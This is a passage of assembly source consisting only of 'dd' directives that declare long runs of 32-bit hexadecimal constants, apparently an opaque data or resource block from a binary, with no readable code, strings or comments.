dd 93FF7ED6h, 0C2C4A1D1h, 0FF5238D8h, 0F14FDFF2h, 67D1BB67h
dd 0A6BC57FFh, 3FB506DDh, 0B236FF4Bh, 0D2BDA48h, 1BF84CD8h
dd 4AF6AF0Ah, 7A608B37h, 0C34104FFh, 55DF60EFh, 0A867FFDFh
dd 316E8EEFh, 69FFBE79h, 61B38C46h, 0FF831ACBh, 0D2A0BC66h
dd 0E236256Fh, 955268FFh, 3CC0C77h, 0BB0BFF47h, 220216B9h
dd 5FF262Fh, 0BA3BBE55h, 0FF0B28C5h, 5A92B2BDh, 6A042BB4h
dd 0A75CB3FFh, 31C2D7FFh, 0B5D0FFCFh, 2CD99E8Bh, 0DEFFAE1Dh
dd 64C2B05Bh, 0F8F2269Bh, 0A39CEC63h, 93ABB76Ah, 0A902FF6Dh
dd 3F9C0906h, 0EBFF0E36h, 72076785h, 0FF005713h, 0BF4A8205h
dd 0B87A1495h, 2BAEE2FFh, 1B387BB1h, 9B0CFFB6h, 0D92D28Eh
dd 0E5FFD5BEh, 7CDCEFB7h, 0FFDBDF21h, 0D3D2D40Bh, 0D4E24286h
dd 0B3F8F1FFh, 836E68DDh, 0CD1FFFDAh, 5B81BE16h, 0F6FFB926h
dd 6FB077E1h, 0E3B74777h, 7D5AE618h, 0F6A707Fh, 0FF3BCAFFh
dd 0B5C6606h, 9EFF1101h, 0FE69D95Bh, 0D3F862AEh, 37616BFFh
dd 0FF166CC4h, 0A00AE278h, 0D70DD2EEh, 48354FFh, 3B3C24Eh
dd 2661FF39h, 16F7A767h, 4DFFD060h, 0DB496947h, 0FF3E6E77h
dd 0AED16A4Ah, 0D9D65ADCh, 0DF0B66FFh, 0D83BF040h, 0AE53FF37h
dd 9EC5A9BCh, 7FEBDEBBh, 7F4CB2CFh, 1C30B5FFh, 0BDFFBDF2h
dd 0CABAC28Ah, 0FFB39330h, 0B4A3A653h, 0D0360524h, 693BAFFh
dd 5729CDD7h, 0BF54FFDEh, 2E23D967h, 0B3FF667Ah, 0C4614AB8h
dd 0FF681B02h, 6F2B945Dh, 0BBE372Ah, 8EA1B4FFh, 0DF1BC30Ch
dd 8D5AFA05h, 372D02EFh, 0FE83C802h, 3980FFC8h, 0D0F7400h
dd 32D0FFF2h, 8E8C111h, 97C50433h, 0EC9ABF41h, 5F5B5A59h
dd 63C35ED6h, 1618530h, 0F0C1F5h, 35A1B7F4h, 5E74CF26h
dd 0B7730CC7h, 0AC14A86Eh, 3C98C33Bh, 1D5B2B32h, 9E2D7093h
dd 0E30CFFFEh, 20FB0F76h, 14270731h, 4CA6BD7h, 5F77E07Bh
dd 0EC811913h, 486C0A5Ah, 30D4FB1Eh, 0F0C44421h, 413DD32Eh
dd 825283B6h, 0D7F00374h, 0E7215A2Dh, 0C0C85C1Dh, 1F8F6D0Dh
dd 9A34BD9Bh, 4BC3429h, 988E7C4h, 2620812Ah, 0DE52CF43h
dd 26A6B77Ch, 0E1161A6Bh, 0F2B214B1h, 0B1B86F1Eh, 8C9E687Dh
dd 0DF09790Eh, 0EA2223E8h, 1A1DF843h, 9E7158Ch, 22173078h
dd 7DD0D093h, 9AF764C6h, 0D4412403h, 1E1E0496h, 0EA0EC686h
dd 0E010940Ch, 590BEC02h, 0E2A37F7h, 50B1B828h, 6662B31Ch
dd 3DA86BDDh, 8B176FA5h, 5A160BD4h, 19BABC58h, 0A53ED900h
dd 4D09A836h, 0F798090Ah, 0B45123EDh, 359F28C4h, 12053785h
dd 780E5BDEh, 45A9EFE6h, 555A0FADh, 84831BDDh, 6AA7C50h
dd 0E703883Fh, 7BD7A3FEh, 4586EE3Eh, 6E2408EBh, 6C3D31ECh
dd 389B6436h, 0C512609h, 977F1083h, 0B2E6C703h, 51DF83AFh
dd 6F4209ECh, 836389E6h, 2F12690Eh, 0D409F66Fh, 7181036Ah
dd 6C192A8Ch, 48375B3Ch, 0E9018ABh, 3ECB5C1Bh, 26608F70h
dd 0F5EF8548h, 0CBD803F6h, 0C33018C9h, 0A7B2019Fh, 6BD712DEh
dd 2215B40h, 3CD542D9h, 6CDBCFC4h, 0C20B9AAAh, 60DD7468h
dd 309DD43h, 0E4321CCEh, 0F1353DA1h, 31B0ED6h, 0FB5B31E2h
dd 9D0C1997h, 0DA95642h, 6D67A806h, 0BB0A306Bh, 148B0B03h
dd 0EC10EFADh, 9551C58Ah, 9DF6C13Dh, 52F8B2DCh, 0B04B036Ah
dd 99C0963h, 97E3632h, 0C29FED4Dh, 64D993C1h, 0E78FD8D5h
dd 0AD6C0D6Ch, 9B9C1A9Dh, 6F6BF48Eh, 0EFFC0704h, 27501763h
dd 1B67BA59h, 2D16DEC2h, 0A2CC87D7h, 4D69EB3Fh, 5D5E52B8h
dd 1B4A9350h, 8CE75867h, 21C08B6Fh, 610FEE09h, 3611B703h
dd 0FB8BC07Eh, 458E3A25h, 7DD2F78Eh, 0EE646CE3h, 70E06C2Fh
dd 0D21D9F6h, 233D0436h
dd 3258F73Dh, 1A567B7Eh, 751B52AAh, 0E925C198h, 0D2C77D86h
dd 3ED50033h, 30A18A80h, 1B432B15h, 0E69B467Bh, 80917504h
dd 60F74D27h, 128DDBE2h, 72D8617h, 724A0FC3h, 5A66A5C6h
dd 1B63FBBBh, 27C60E63h, 0BFF7856Bh, 0DE6F03F0h, 308DDBF9h
dd 0D98330B3h, 60583B03h, 632EF1CFh, 0EE67E92Bh, 0F9D0DBBh
dd 0F1C119E1h, 6BF43B99h, 0DC6AA06h, 6C9B12D6h, 32FA58C5h
dd 43C1D7AEh, 2EBBDABCh, 5A802EEh, 0E12BAA8h, 0BBD08421h
dd 1C0E070Fh, 0E658263Eh, 4E764208h, 93844D4Ch, 83675209h
dd 3ED6B264h, 18935AF0h, 80C3712h, 6DA35BA7h, 80422F41h
dd 0BDFF7AC5h, 0FF1E854Ah, 8700E34Fh, 80BE0878h, 0ECB0F589h
dd 29769CD6h, 83157BC6h, 6151A97Dh, 0CE4CEA2Dh, 0E7C1A28Bh
dd 67681FBDh, 8B6714B7h, 0DBEB4781h, 0ACA0036Dh, 6D187966h
dd 0A3C3B96Dh, 27B569F6h, 0A9602634h, 0FA720EDEh, 0C9F07820h
dd 4610CC36h, 207A2017h, 6B08BBB5h, 51EFF925h, 0CC7C6732h
dd 0BED83260h, 7D06D20Dh, 967E497Ch, 196B4402h, 0C65FFBBh
dd 0C966181Bh, 715484F9h, 0A4DA06F8h, 197692E8h, 0B7DDE3ADh
dd 3D4EA93Bh, 8C493583h, 0F49B4D84h, 75B03D17h, 5BE803B9h
dd 9DA3C277h, 4DDFDAC6h, 98F3824Ch, 3D9E5B93h, 8A86086Eh
dd 0C3B21AC9h, 43346043h, 0BE52BECCh, 0FCDAFA3Ah, 196B54C2h
dd 0C6E50EB9h, 54CF800Eh, 0D63DA69h, 26DA6787h, 12E7D8DBh
dd 4B9782F6h, 0D303F6E9h, 0F704AC50h, 5AC75ECEh, 0DC74ABC3h
dd 0B0DF8901h, 67DBDh, 0A5DD4E58h, 216F410Eh, 6F436514h
dd 6FE84D04h, 0F67C7C7Dh, 0F60E5765h, 49872FBCh, 1B937030h
dd 4C025826h, 4ECD0662h, 0AB9B726Fh, 166347F0h, 3C82497Ah
dd 161F7331h, 6002135h, 0EE03DD84h, 9DF978DFh, 902AD03h
dd 35377DBh, 0EB74F165h, 0C580EE01h, 6C0BFFD9h, 0F011D03h
dd 212EAA20h, 360F3474h, 0CF116542h, 6EE8690Fh, 0CE9D0D03h
dd 16EBC229h, 652E3858h, 98C347CBh, 3FBF4DCh, 92C2B20Ch
dd 304FDA18h, 7EABFE24h, 8F6ADF3h, 25FB00ECh, 0F8EAF627h
dd 9FB5F60Ch, 0A3F6046Ah, 31292651h, 0F04383C7h, 41C58301h
dd 89F4C1D8h, 9A1D942Ch, 0D22DBFA7h, 758BF17Bh, 0B1E7008Fh
dd 53E1FAFDh, 9FB7A95h, 0D00362BAh, 498741C3h, 35300D60h
dd 0ADFFDD83h, 3A1FCC2h, 31B26078h, 200E193Ah, 1BBD894Bh
dd 12786209h, 549B6C78h, 190DF91Bh, 3E80FBF8h, 3B7010CCh
dd 7C3FE33Ch, 0EC531BEDh, 0A19F4B62h, 0F7C6F362h, 932AC6FDh
dd 63090C03h, 0D3087B09h, 41B1376Fh, 496E8012h, 1AA08198h
dd 210E3738h, 2F75207Ch, 0BD61C4h, 1E8E0089h, 0EB7A1EE5h
dd 7203A316h, 0ACED28B1h, 0E9801007h, 0BE48BD66h, 19EB1FACh
dd 0C6720336h, 0BEB2E28Dh, 5D107D10h, 0F35917B6h, 3C114BD8h
dd 16F3C15Dh, 111B5A80h, 9BBE8C6h, 0FD656B0Dh, 6C656E72h
dd 1B9C3233h, 1EF41289h, 730E459h, 0B101B62h, 0D65FB844h
dd 453B2C5Bh, 15DDE282h, 0ADF65CB8h, 0AE7B2928h, 0DA02DBEh
dd 0B00A834Eh, 0CBC8E2B0h, 6FF8124h, 0DD0314AEh, 0B6204F17h
dd 1C9A8304h, 19302C09h, 52BEC749h, 37504FBBh, 0C9D82661h
dd 757B22C5h, 0F1CA062h, 6F8834Bh, 19095BDEh, 9BAFD111h
dd 43658846h, 5F0F8CB3h, 7403691Bh, 0F6F00F37h, 4E79394h
dd 5EC53964h, 0B7696397h, 3FE1EF21h, 883CB5A6h, 495F5BCDh
dd 1243262Ch, 0C2F262D1h, 0D746CACh, 5D87FFFFh, 0D923C581h
dd 0DEB40012h, 0A71E4FC8h, 6F0EC61Eh, 0BEF2BB3h, 0B013EB3Fh
dd 1C3D72DAh, 0A503B1B9h, 0E3D98E18h, 9D9368Eh, 0FD83454Dh
dd 0A1796571h, 0C3BA0E49h, 0E7154F86h, 348D5D6Eh, 0CD33B0EFh
dd 9783BD89h, 743D4740h, 769051ABh, 0B094C3Dh, 399D30ACh
dd 0C403D617h, 85B1353Dh, 4C7FDEEEh, 0E8741D1Eh, 5F411A21h
dd 0F7DDECA1h, 0D02500F3h, 0A72C24C5h, 78584D61h, 976F6EEEh
dd 53BC8123h, 0D4311D16h, 0B0A39319h, 0B610D03Ah, 9DE80336h
dd 0FECFF731h, 3BB8D18Bh, 3B4B9B56h, 4A5B0412h, 2658A8E1h
dd 9712C366h, 6FEAAF1Eh, 0E96A6E03h, 5F00D6C2h, 1620A30Ch
dd 0A82F5D2h, 0DA8447B3h, 90680C9Eh, 9DB08385h, 0FCF461C9h
dd 1DCEF7A3h, 248C597Dh, 0C2452CBh, 0DCB67AFBh, 6781BCA7h
dd 64FF77E9h, 21896491h, 81014AE9h, 770D0D00h, 0EE3732AFh
dd 7B587746h, 0A2179324h, 6011B116h, 0D9E7DE6Ch, 0F746FA07h
dd 2882CC74h, 3E1B538Ch, 47CCAD18h, 4A7134E1h, 661931FAh
dd 51605DDh, 26E0A141h, 1D3C7569h, 0AF75D377h, 3242F52h
dd 47842DA6h, 499638E5h, 35CCAB22h, 17D38701h, 5C1FBA41h
dd 0D7F01218h, 1E2C5C0Dh, 8B72E5E7h, 1CA2EC21h, 54C24260h
dd 2BF1F858h, 6978E9C9h, 689638FBh, 0C9C1610Eh, 0D7F7A5B0h
dd 8BDCD4D6h, 5E776B1Fh, 0E9D90D0Bh, 8C24C31Ah, 15B4C86Dh
dd 746D11ECh, 3AB46B39h, 30CA6705h, 3FB61363h, 0E231FF64h
dd 0FCFE4DE9h, 59AB0FD1h, 0F663BD21h, 0E8127FBAh, 8E76809Eh
dd 7FCEA45h, 46EB1B48h, 0B3832565h, 6EAB18D4h, 0C7B6A68Eh
dd 1A7C0FD9h, 0DD838434h, 1F0D6346h, 0ADB1EA61h, 0A3761D57h
dd 341825E4h, 0E7809F6Dh, 3E593062h, 0FB7A56EFh, 9D0CE2BAh
dd 35B1F90h, 2A57B172h, 96CCB78Ah, 0D6C06B52h, 0D6D4868Fh
dd 471863D1h, 0C1F9245h, 96B1FBDCh, 0F8ED390Ch, 0F923FE97h
dd 0E8E40172h, 0C1219F03h, 0F25EFF18h, 83F2C32Bh, 0E8A673C6h
dd 0A800FE86h, 826859D4h, 6D4C3923h, 0C215BD8h, 3B460281h
dd 9758EB78h, 0A93212A4h, 187D3CD3h, 0DF6BEA80h, 81F21B41h
dd 6842C6C2h, 20F2ABEDh, 12F2C8DBh, 0C1F3FD07h, 168816C0h
dd 0F3C90CBFh, 0FF240546h, 0F2D05CCFh, 3399244Bh, 0D93BC9EDh
dd 0C105FA4Bh, 5751DC9h, 0D465DA8Eh, 0FF75A50Bh, 0A3C42E16h
dd 0F547D2EAh, 0DBE614FFh, 8D54DAE1h, 0DEE6FF17h, 0C34B12D4h
dd 85FFC74Ch, 0A91FC9FFh, 0FF45CC42h, 0F1C83DCCh, 372B9D10h
dd 0C0F4C5FFh, 0C4982CF8h, 7EEAFFFCh, 0F8B8E1D8h, 0E6FFDD48h
dd 280D62E1h, 0FFD6EFDBh, 9293ECECh, 0EA2B05DAh, 9AAC89FFh
dd 0D998999Ah, 0E021FF0Bh, 9982B99Fh, 0BEFA4479h, 48EA5E86h
dd 85B665DFh, 0B2FFB38Fh, 0D662B28Ah, 0F1ACB68Eh, 0CDBB82B2h
dd 0A284882Fh, 0A0A1C5A2h, 0D8F97DBFh, 0FFAA24AFh, 963DAE27h
dd 693C44AEh, 565751FFh, 6CC8855h, 645CFF25h, 0CB634A5Ch
dd 41FFC841h, 53477D46h, 0FF48727Fh, 994E4F48h, 750E2FDBh
dd 767AB1FFh, 0CA7B78B4h, 7EC9FF7Ah, 747E4638h, 63FF5AB6h
dd 5C3FD72Bh, 0FF696A6Ah, 31F9C968h, 13291710h, 2D0A56F4h
dd 81146F17h, 0BFF6445h, 2911E92h, 0FF0CC0ECh, 4043E07h
dd 9FA80A0Bh, 97253FFh, 0CC253137h, 0E335FF0Bh, 2D390F55h
dd 3CFFB231h, 18183CB5h, 0FF393620h, 82A2251Ch, 0A32AA030h
dd 0FF172EDBh, 0ABB29706h, 0D6EEFFECh, 0DBE21603h, 51F06BCEh
dd 0BFC2C2E4h, 79530B3Ah, 0BFFD7B8h, 0C00EC8FBh, 0FFF1F7CDh
dd 0F6C881E5h, 35F4F5F6h, 84456FFFh, 0FBAD8BE3h, 9AE5FCE4h
dd 0E5E7DF32h, 0FF09E81Bh, 0EA93B47Eh, 9F84EED6h, 4292AAFFh
dd 9BA754F6h, 9894FF5Bh, 0B68A9CA4h, 81FF83BBh, 12B48780h
dd 6F8EF7D8h, 0B69B98F8h, 83DC8EB5h, 82FFB6FFh, 7CB1F0BAh
dd 0FF99A38Fh, 9E0E25A3h, 0AAABA4A4h, 0F33F72FFh, 501CA9D2h
dd 5B50FFE3h, 6F556796h, 9DCB2658h, 3CFF88D9h, 0FCCE4178h
dd 0FF3DC7D6h, 36CF3B5h
dd 4D4E4E70h, 0E7334CFFh, 0B76B0CCDh, 0BA74FF79h, 7D437975h
dd 44FF9869h, 60616262h, 0FF39F1DBh, 6B516F18h, 6E55A5EFh
dd 0F1E94BFBh, 7FC61129h, 0A68E6C15h, 24850465h, 99DAE2D9h
dd 60E173Ah, 0B791FF32h, 0C331576h, 29FF64F2h, 28393108h
dd 0FF370DACh, 38025BE1h, 0F33E3F38h, 0FF8FABA5h, 31251B25h
dd 2A2A1C6Ch, 0BA2829FFh, 0D75071B9h, 55D2FF56h, 0D5EDB1D6h
dd 0D9FDDADBh, 0A1824828h, 443D6FD8h, 0FDFFE5C1h, 0DDC9D3C7h
dd 0BECFF654h, 470AFFCEh, 0A5FF6DE5h, 0FE78FB84h, 0FF65E27Bh
dd 6601E2DAh, 10FCE6DEh, 0EBEBD2FFh, 92D4E9F1h, 9091FF92h
dd 0E8C90111h, 98FFA29Fh, 0C39E9F98h, 0F0FEDF0Bh, 868A4185h
dd 89B1FFFFh, 0FF8D8E8Fh, 0CD0E26A0h, 6B505ACh, 81FFB742h
dd 850676BBh, 27B7ABBFh, 23C775FFh, 133DFF35h, 5197B1D2h
dd 68C20F45h, 54FFFF56h, 24E5CF3Ch, 5FFF6543h, 42C82389h
dd 1B7F46CBh, 0BC25369h, 75FFFFAFh, 0F4FAF4Eh, 77D67149h
dd 0ECFFE476h, 447C0526h, 0DEFF427Dh, 77635913h, 0FF675D3Ch
dd 6AE6E1CAh, 564C6EE5h, 0F7046EFCh, 2F171ED0h, 217BC1FFh
dd 0B0AA1BFFh, 31C1C26h, 97CEF002h, 746F7A5Bh, 0FF320A04h
dd 0CC20C60Ah, 32093301h, 0E7191CFFh, 3A3B350Dh, 0A867FF39h
dd 1B384162h, 20FF2123h, 98B04B27h, 0FF123657h, 39C0DE2Bh
dd 0B107D117h, 505FEBFEh, 45DA53D6h, 1A1EFF17h, 0CF1D04FFh
dd 0C7F300C2h, 0C4C4FFFEh, 5F7BCACBh, 0C9FFB293h, 0F079F046h
dd 6FF7CFC1h, 6C05FBFFh, 0E28344FFh, 0E352FF4Dh, 0E5DBFFD8h
dd 0E9DF30F1h, 0D0FBF9FDh, 0ECEDEEEEh, 0EC2D713Fh, 979716BFh
dd 6F9BA1D7h, 6D9EA51Ch, 0BABB40FDh, 0E1BC4582h, 5A7CFFFFh
dd 6F8DB5EEh, 20C3B1FFh, 0B0C9EAFFh, 0B8B9BB83h, 2AA8FFBFh
dd 9AA6DFE0h, 0A5FFB0A2h, 8B3E424h, 0FEAFA8A9h, 3379AF95h
dd 5F50506Ah, 2607C3D3h, 53995DFFh, 0BE5F665Eh, 7B1DFF7Eh
dd 0D4E78744h, 9CF04870h, 0BF4F7728h, 0E6EA73FFh, 72FF0B2Ch
dd 7A7B754Dh, 0FFE8E679h, 0D3780122h, 4B61D061h, 5C73FF6Fh
dd 0E66AFF51h, 6D55B573h, 11FF1213h, 694A808Eh, 0FF182010h
dd 1C24155Bh, 33BAC27h, 0FF071F5Bh, 77B8901Fh, 0F093116h
dd 0BD0D0EFFh, 2C4D8EA6h, 0F234FF0Ch, 0EC3800DAh, 0CFBFE58h
dd 2222043Dh, 0B1247FFFh, 0B82F5879h, 382A12F1h, 43FFB45Fh
dd 0D7E2DFBFh, 0F158D6EDh, 0DAE21389h, 0DF57F0BFh, 0FA81C348h
dd 0A513C5FBh, 0C8855F4Eh, 0F5CDF439h, 332FA12Ch, 0F4CC69BEh
dd 0FF979420h, 0C4FE7AEEh, 4CE4A4FDh, 7717E2D9h, 0D7FF2401h
dd 0E8E8D2EBh, 0FFA6EEEFh, 8DEE2F79h, 959696A8h, 0FDD94FDh
dd 0BC83E425h, 407D85FFh, 44E652BFh, 498E8BB6h, 0A43497FFh
dd 5A02E7Dh, 957E9769h, 0A3BD85D1h, 3260FF97h, 0B8D91AFFh
dd 0BEBEA890h, 0ADAFFF97h, 0C6E753ACh, 52FF2B0Ch, 615B6694h
dd 0FFF84F5Bh, 0D39E5E65h, 0B2437A7Dh, 7CDBCBFFh, 48494A4Ah
dd 11D9FEB3h, 704A7730h, 89FF1770h, 627FFE3h, 0F27C437Dh
dd 58FCE130h, 0A600B460h, 68286F57h, 49FF616Dh, 0CF7A6C54h
dd 0FF451028h, 6411AB76h, 1893189Ch, 1D970CFCh, 63D21D94h
dd 0D23EAFFh, 34B405FFh, 30313232h, 69A1FF18h, 3A013F48h
dd 0D6FFE640h, 42F63E06h, 0FFA023A7h, 1AE5AF27h, 2F29112Ah
dd 732D2EFFh, 0D4AD8E44h, 0D5E4FF16h, 0DFCDD9EFh, 89FADCE3h
dd 0C3FBBFBEh, 0F2C7FF5Fh, 0B7FF9852h, 65CAF2CEh, 0FFCDF563h
dd 40F1F2F3h, 0E8894A62h, 4A7CFF75h, 0E11897C8h, 5C81FF37h
dd 0E5DD877Eh, 0E9FFEAEBh, 91527A2Ah, 0FF91A8F0h, 57F175FCh
dd 98A094A4h, 0A7F84CFFh, 839C9D9Fh, 0DC16FFE9h, 894482FBh
dd 88C6B28Bh, 0AEFFFF88h, 0B5CEEF1Bh, 0A1FFB58Bh, 9B80668h
dd 0FF87C4B8h, 0A3BCBDBFh, 0DB1C34E3h, 9564BAFFh, 0BFAB91ABh
dd 0A06FFC64h, 51536BACh, 0C27CFF2Fh, 5E27FF08h, 71485A62h
dd 43FF5D65h, 0D0FA4142h, 2F40391Ah, 0FF74755Eh, 48CF924Ch
dd 0FD10A470h, 0BFFE75D5h, 6548FAC0h, 7DFF7F47h, 0F614637Ch
dd 1D621B3Ch, 52F10B28h, 0BF7F786Ah, 2A72C6FFh, 9EFF8F13h
dd 1A1A2C87h, 85BD1819h, 1FFF5B8Bh, 68D028Eh, 0D2073EA5h
dd 0FFCDC838h, 0E0C850Ch, 0F8B431B7h, 340E7131h, 0E4FFDF34h
dd 844283ADh, 3C67FF21h, 282812EDh, 0B9F7F4FFh, 0FA2FAE6Fh
dd 6FFE5CD5h, 525DB9FFh, 0DC55DCFFh, 0D6C0F87Dh, 0CB06FFCDh
dd 0CACAFCC5h, 0BA52C8C9h, 0EFB071FFh, 4548A548h, 34B3B4EDh
dd 0F0D2C8FFh, 0FFD2F5E3h, 0E4485272h, 0F1783401h, 337CD05h
dd 94FF94AEh, 0FD29A9Bh, 0F499E2C3h, 81E880A7h, 0B085112Fh
dd 3A65FC33h, 0AA8E398Ah, 8AF1FF37h, 0C05F6B3h, 0FF688F70h
dd 0A9BD83D9h, 0FFA0874Eh, 21A8B4E2h, 0B9A522A5h, 8789FF74h
dd 0E8C0F2AEh, 0CFF4627h, 0FBF2E721h, 31C0738Fh, 0CBFFD249h
dd 48E9B733h, 747FFF76h, 425ED52h, 7EF6FF7Bh, 0A0C462F5h
dd 0FF1A6751h, 0FF6FE7B4h, 4D83DD16h, 2AA95FFFh, 2E067F39h
dd 0D87A0C16h, 0DF1F29F8h, 0FFC71C2Eh, 58E992DEh, 7FFF0E77h
dd 3CCCFA18h, 32FFB833h, 0F48A36BBh, 0FD013B39h, 55FED3Bh
dd 0E32D2B3Fh, 26FF2F20h, 77FFB330h, 81922D56h, 0C0364F96h
dd 0FFBFA027h, 0D75312C0h, 8BDBFF5Ch, 0DDDEDEE0h, 55F6EFDCh
dd 0E6C3BC9Dh, 32BAC7C4h, 0FFDFC8C8h, 8E4F591Dh, 0F5CBEDFFh
dd 0F9CF9523h, 1699B72Fh, 0FF778C1Bh, 0D1E4681Ch, 0A3BEE46Fh
dd 446A2E9h, 1D78FF0Ch, 6ED0CB07h, 3F9AFF63h, 0D6078204h
dd 4CFF7E86h, 0B531FF32h, 2EDDB532h, 0A58854Fh, 18E2A55Fh
dd 79FF4538h, 0A99B6A5Eh, 0FF21AD93h, 0CF50977Eh, 556C0703h
dd 0FF98AB85h, 6758559Bh, 435C5D5Fh, 0C3D6ACDBh, 457DE342h
dd 9C7FFF4Bh, 5031F2DAh, 717EFFB2h, 74F374F4h, 79FFFDA7h
dd 451279FEh, 0FF0BD87Fh, 6760605Ah, 0D7F11E66h, 537516FFh
dd 0AD19B06Dh, 0D012FF1Fh, 16A61723h, 99FE1AA5h, 0FC081A22h
dd 0FFB71D25h, 92FF4201h, 301879BAh, 5668DC08h, 0C0DFFB4h
dd 6CA6E933h, 0FFE8124Bh, 0D3AD836Bh, 0FD0569B1h, 0E0D1283Eh
dd 0FFA02119h, 96BE82DFh, 14FF3455h, 552A512Dh, 0A51ED3E9h
dd 0D4E5FFD9h, 0AC4A7D0h, 0F9FFBFBEh, 0AC3FACAh, 0FF7F21FFh
dd 0B69829C8h, 0CDCFFFF7h, 642DF3CCh, 0EAFF8B4Ch, 0CAECF6CEh
dd 0AF2AFAC2h, 0A0ABFF9Eh, 0E6265BE5h, 0D28A3EFFh, 2C8E3AEAh
dd 0C693B7E3h, 0ADFF687Ah, 0AB104696h, 0FF1A9B1Dh, 81A7349Fh
dd 840437EDh, 28403FFh, 0B389B94Ah, 0ED5BFF8Dh, 70B2834Dh
dd 8EE0B782h, 165FB4B4h, 0C2032D2Bh, 0FFFFA185h, 29DC0608h
dd 5BA52AA5h, 0ACBFF13h, 6A89FF7Dh, 6E368252h, 51FBFA57h
dd 5E5E60BBh, 0D57C7EFFh, 1A433C1Dh, 5F46BEFFh, 0EF6DC049h
dd 4563D2BFh, 0FFA1DA7Eh, 0E863EFB4h, 53CBEC67h, 7FFF6B89h
dd 0D0F8FD6Fh, 0FF0B0E6Fh, 0B0769BC2h, 1F19FF21h, 942E1D1Eh
dd 4D67D5Eh, 5FF6F8Dh, 839CBF8h, 0DD43FCEh, 981BFCDh, 35363731h
dd 86AE73F4h, 3C782F45h, 0E2C17E2Ah, 2428BF13h, 13B1AB57h
dd 7FFF2B83h, 70BA3F2Fh, 0EAFFD6AFh, 0FC4D2AD3h, 0FFDAD615h
dd 58DFD718h, 97C25BDEh, 0D0C2FAFCh, 0BC5FD1Ch, 0DFDC9FFh
dd 0C8B19258h, 25420B5Dh, 0F64497FFh, 0C239FA47h, 9FB9F8FBh
dd 37E0C7B1h, 26DCADCh, 4CE5F001h, 0D48E2F2Bh, 8CFE38ECh
dd 705090A8h, 0C8059A56h, 56B98F1h, 94FF3465h, 0DFFC68Ch
dd 968F0A8Bh
dd 0BFB2B4C0h, 2315B0FFh, 180BC809h, 0DF6DC1BBh, 63CBFFDFh
dd 0CB9FA090h, 0FFD6A5A7h, 0B2D3143Ch, 0F7E6AF96h, 85D01F91h
dd 5BA8BFCDh, 41678F59h, 7FCACBA1h, 47C3464Bh, 0EFFF4BCCh
dd 2D9B4D73h, 0F1727274h, 0E1477071h, 417FC62Fh, 78D5C27Bh
dd 3A9E0FFh, 5E55FFEFh, 6BFF6464h, 0D3FDFA6Ah, 0FF577112h
dd 9841E611h, 0B5149F14h, 0A819ABFFh, 1E258819h, 5C14FF12h
dd 809D033Ah, 9EB3FC0h, 71FFA71Dh, 0FF6E377Dh, 0EF4F51E7h
dd 0CF9FF59h, 0F774BD3Eh, 37FF2319h, 24241E4Bh, 0FCA92A2Bh
dd 315293BDh, 0C62DE0EDh, 0D2E9B5D3h, 0E371FFDFh, 0FDBD0BDDh
dd 7ED5C1E7h, 951BC4FBh, 0FA45834Fh, 0F623C97Ch, 0F2FF2FCCh
dd 0ABE3675Fh, 7FFFF18Ah, 0FC7486EDh, 1BF4FC73h, 0B9E1D022h
dd 728533FFh, 0B933893Fh, 3173FF83h, 9CA6EBC6h, 0E0827FFFh
dd 81FADB17h, 8A8ABCFFh, 1B298889h, 0AFF0F431h, 0A12FAE3Eh
dd 0FF30B123h, 11B83FB8h, 0AD2BC84h, 24A127FFh, 966721A1h
dd 0FCFF02A4h, 9E6EC87Ch, 52C50BADh, 0C63FFF42h, 4425E6CEh
dd 0F75D64FFh, 42CC3FFBh, 0B646FECFh, 4BC447CBh, 60FFDFEDh
dd 0FF717796h, 744B11A7h, 43967ED7h, 0EE797BD6h, 20EA41FFh
dd 625A661Fh, 5D9370F6h, 69FFFF65h, 1132F87Ah, 13D12B68h
dd 3BF11h, 667A880h, 0B91B22FFh, 92CBDCh, 8900FA8Dh, 179A793Fh
dd 0F10B31FFh, 0C368F1Fh, 0CB32FFBFh, 0E24A6BA7h, 5F3A0C31h
dd 0A91638FFh, 2740FF61h, 26A922AAh, 15FFE480h, 962B112Bh
dd 0E92E15DDh, 0FF3F6152h, 0FF5C9BA8h, 0FF1DCACCh, 0ED1CFFBEh
dd 0C0F203C3h, 0C589C7FFh, 5E127FFFh, 0F6CAB394h, 6E4CEFFh
dd 7CF7C030h, 0FA7FFFF6h, 0FFF53846h, 29FFFFC5h, 0F7E3D983h
dd 42E4DEDAh, 0FCEAFEFFh, 0E992B37Fh, 2D937716h, 5497FFFFh
dd 86E72800h, 0F2F49BA2h, 685DFB7Bh, 0BDFF3FE6h, 0FF8BB785h
dd 0D2FF18E3h, 0BF7288F1h, 0FFB688B1h, 98B4B5B6h, 0BBC4E52Dh
dd 0FE7EFF0Dh, 0A613A210h, 2DA59DDAh, 0E9A9FFFFh, 0B0D1123Ah
dd 0C8426392h, 9E4155FFh, 615A5695h, 0FF5F59C6h, 1ED476FCh
dd 0E85B443Dh, 736BE052h, 4FFFDF4Bh, 0FF10DAF4h, 724A760Fh
dd 764E4B60h, 42F9A4FFh, 0F71EAA7Ah, 63E8FF7Fh, 0F7FA771Ah
dd 6CB76361h, 0ED0FBD36h, 42DF6EDCh, 51FFFF02h, 182F5977h
dd 32FF7E72h, 1D961D95h, 0FA0EC3A4h, 0D0043C00h, 0C8FF5F64h
dd 4202CEE8h, 0C330F4F8h, 34406FADh, 3DB3C22h, 0FF3FFF3Bh
dd 5F60AA7Eh, 0A223A526h, 8F3E27D0h, 91BB8DFFh, 0FF977E5Ah
dd 0EDFFB705h, 1BB3C3D7h, 0ADE7D8E8h, 0C3FFFFDFh, 0BB7C54BEh
dd 0FAC7FEDAh, 0F0876F7Eh, 0CCFF17CEh, 0AD65FF2Dh, 0F672F38Ch
dd 0FBFFFA71h, 4CFFCA38h, 0F8E24FFEh, 0E7E1D9CBh, 7EFE37E6h
dd 0F495C656h, 0CEFAF8FFh, 0C817A152h, 54AC8195h, 97E7FFFh
dd 0BA87E0C1h, 0FDFF808Dh, 0D7132186h, 0FF238DF6h, 0F8061682h
dd 9A048B3h, 29ABFF17h, 87EE302Fh, 0C177A1FFh, 48B1A59Bh
dd 257D1A9Fh, 7AADFFB1h, 525E6D99h, 54856068h, 5A6CFFFFh
dd 5F58595Ah, 20FFE1CBh, 9842795Fh, 0AD7EB11Fh, 4A851447h
dd 0EC59CEFFh, 0A081FF91h, 7C46F0FFh, 9662FF6Fh, 1ADBFFF5h
dd 7D695F79h, 6CF153E1h, 2F50D661h, 2CD282FFh, 0C1EC15F4h
dd 0FD6B464h, 0C91FDA6Fh, 33FF1263h, 0C9FEB8h, 330D350Eh
dd 8AA2C75Fh, 0FF288B49h, 0BBB12E7Fh, 0FF3DB83Dh, 9221915h
